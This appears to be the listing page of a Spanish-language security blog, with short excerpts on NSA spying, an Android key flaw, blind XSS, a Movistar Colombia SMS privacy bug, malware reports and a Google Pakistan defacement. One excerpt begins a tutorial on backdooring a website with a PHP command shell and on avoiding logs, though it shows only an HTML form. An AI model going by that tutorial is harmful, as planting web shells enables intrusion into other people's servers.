Seguridad
noviembre 4, 2013

El espionaje de la NSA y los ataques a PHP y Adobe protagonizan octubre

El mes de octubre, desde el punto de la vista de la seguridad, se ha caracterizado de nuevo por la información publicada acerca de los casos de espionaje realizado por la Agencia de Seguridad Nacional (NSA) de los Estados Unidos a países aliados, los ataques a PHP yAdobe. Así lo ha dado a conocer ESET en su informe. Según palabras…
Read More
Android
noviembre 2, 2013

Android 4.4 Master Key Vulnerability, Hacker Descubre la Clave Secreta de Android 4.4 KitKat

En Julio de este año, los hacker Chinos lograron vulnerar el apk de Android que les permitian obtener la clave maestra o Root del sistema y con esa misma funcion crear troyanos. Google Ya Realizo las Tarea  de Parche. y se espera actualizacion en la proximas horas. Hoy el investigador en seguridad Jef Freman, logro mediante un codigo en Python…
Read More
Seguridad
agosto 15, 2013

Blind XSS: La bomba de tiempo de los ataques Cross Site Scripting

¿Qué es el BLIND XSS? Blind XSS es un Variante de cross site scripting (XSS) , donde el atacante “a ciegas” se despliega una serie de cargas útiles maliciosos en páginas web que puedan guardarlos en un estado persistente (como en una base de datos o en un archivo de registro) . Entonces, sin conocer ningún detalle acerca de que…
Read More
Seguridad
mayo 30, 2013

Fallo de privacidad en Movistar Colombia (movistar.co)

Este bug permite ver todos los sms que han sido enviados desde el portal de Movistar Colombia (movistar.co). Movistar tienen una aplicación que permite enviar sms desde Internet, lo que en principio es excelente, pero ustedes se han preguntado: ¿Quedan registrados los mensajes? ¿Alguien, aparte del destinatario, puede ver el contenido del sms? Pues bien, sí, los mensajes se almacenan…
Read More
Tutoriales
marzo 19, 2013

Creando una mini Shell en PHP

Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea). Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El código sería así: <form method="GET" action=""> <input type="text" name="comando"> <input type="submit" value="enviar">…
Read More
Seguridad
enero 15, 2013

Kaspersky: detecta un virus que lleva cinco años espiando a los gobiernos

Kaspersky acaba de publicar un extenso reporte sobre un virus que, desde 2007, ha robado información de organizaciones diplomáticas, entidades gubernamentales y laboratorios de investigación científica. Los ataques se dieron principalmente en Russia y en el este de Europa, pero también se detectó actividad en Norteamérica y Europa occidental. Kasperky Indentifico y realizo un mapa de de ataque de dicho…
Read More
Seguridad
diciembre 28, 2012

Joven de 16 años arrestado por robar datos bancarios

Un hacker de 16 años ha sido detenido por presunta piratería en diferentes ordenadores a través de la ciudad española de Alicante, el robo de información personal de los usuarios, tales como datos bancarios, contraseñas de sus cuentas de redes sociales, correos electrónicos, direcciones y otros datos confidenciales. De acuerdo con las personas cercanas al caso, dijo el joven de…
Read More
Servicios
diciembre 28, 2012

Kim Dotcom: promete una presentación “épica” de su nuevo servicio Mega

El grandote de Kim Dotcom sabe que, a pesar de lo que pudo haber sufrido luego de la hollywoodesca detención por parte del FBI, todo lo que vino después de eso no hizo otra cosa que convertirlo en una especie de héroe en la guerra contra el Copyright. Acostumbrado a hacer todo a lo grande, esta vez decidió presentar su…
Read More
Seguridad
noviembre 24, 2012

Hackean Google de Pakistan

Hoy en la Mañana los servicios de google de pakistan fueron defaceados (defacement) Aqui una captura del defacement (Foto sacada de @MacGregor ) http://www.google.com.pk Este mismo grupo ataco a los subdominios como news.google.com.pk, code.google.com.pk, apps.google.com.pk. Entre otros mas. A esta hora los servicios se encuentra caidos.. solo quedan los mirrors en Zona-H ( tambien se presentaron defacement a otros sitios…
Read More